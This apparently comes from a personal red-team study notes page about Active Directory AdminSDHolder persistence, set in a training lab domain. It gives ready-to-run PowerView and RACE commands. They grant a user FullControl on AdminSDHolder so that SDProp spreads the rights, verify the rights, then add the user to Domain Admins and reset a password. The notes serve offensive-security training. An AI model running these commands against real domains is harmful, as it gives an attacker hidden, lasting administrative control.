HomeGitHubPortfolioTwitter/XMediumCont@ct

8.7.1 - AdminSDHolder

AdminSDHolder

  • AdminSDHolder is an object located under the System container in AD. It defines ACLs for high-privilege "protected groups", such as:

    • Domain Admins

    • Enterprise Admins

    • Schema Admins

    • Backup Operators

    • Server Operators

    • and others

  • A system process called SDProp runs every 60 minutes, syncing the ACL of protected group members to match that of the AdminSDHolder.

🎯 Persistence Technique:

Granting permissions to a user on the AdminSDHolder object causes that permission to propagate to all protected groups.

Example: Grant FullControl to student1

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' `
                    -PrincipalIdentity student1 `
                    -Rights All `
                    -PrincipalDomain dollarcorp.moneycorp.local `
                    -TargetDomain dollarcorp.moneycorp.local `
                    -Verbose

Alternative (RACE Toolkit):

powershellCopiaModificaSet-DCPermissions -Method AdminSDHolder `
                  -SAMAccountName student1 `
                  -Right GenericAll `
                  -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' `
                  -Verbose

🔍 Verifying Admin Rights:

Using PowerView:

Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |
  ForEach-Object {
    $_ | Add-Member NoteProperty 'IdentityName' (Convert-SidToName $_.SecurityIdentifier) -Force; $_
  } | Where-Object {$_.IdentityName -match "student1"}

Or using the AD module:

(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access |
  Where-Object {$_.IdentityReference -match 'student1'}

Abusing AdminSDHolder Permissions

Add to DA group (if you have FullControl)

Add-DomainGroupMember -Identity 'Domain Admins' -Members student1

Reset password (if ResetPassword right is granted)

powershellCopiaModificaSet-DomainUserPassword -Identity student1 -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force)

Write group membership (WriteMembers)

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' `
                    -PrincipalIdentity student1 -Rights WriteMembers

Labs

Previous8.7 - Persistence via ACLsNext8.7.2 - DCSync Attack

Last updated